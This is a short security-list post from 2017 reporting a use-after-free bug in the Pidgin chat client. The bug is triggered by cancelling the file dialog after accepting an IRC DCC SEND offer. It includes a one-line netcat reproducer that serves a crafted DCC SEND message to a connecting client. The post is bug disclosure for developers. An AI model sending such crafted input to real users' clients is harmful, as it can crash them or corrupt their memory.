Pidgin uaf when cancelling file select dialog after accepting DCC SEND
Joseph Bisch
joseph.bisch at gmail.com
Wed Sep 20 22:05:31 EDT 2017
Hi,

Here is the reproducer:

    echo $':c PRIVMSG a :\x01DCC SEND a a a a\x01\r\n' | nc -l -p 6667

Then you must accept the dcc send and cancel out of the file select
dialog. If you either click save on the file select dialog or you do
not accept the dcc send, then the uaf does not happen.

Joseph
-------------- next part --------------
A non-text attachment was scrubbed...
Name: pidgin2.asan
Type: application/octet-stream
Size: 10691 bytes
Desc: not available
URL: <https://pidgin.im/cgi-bin/mailman/private/security/attachments/20170920/fc79d679/attachment.obj>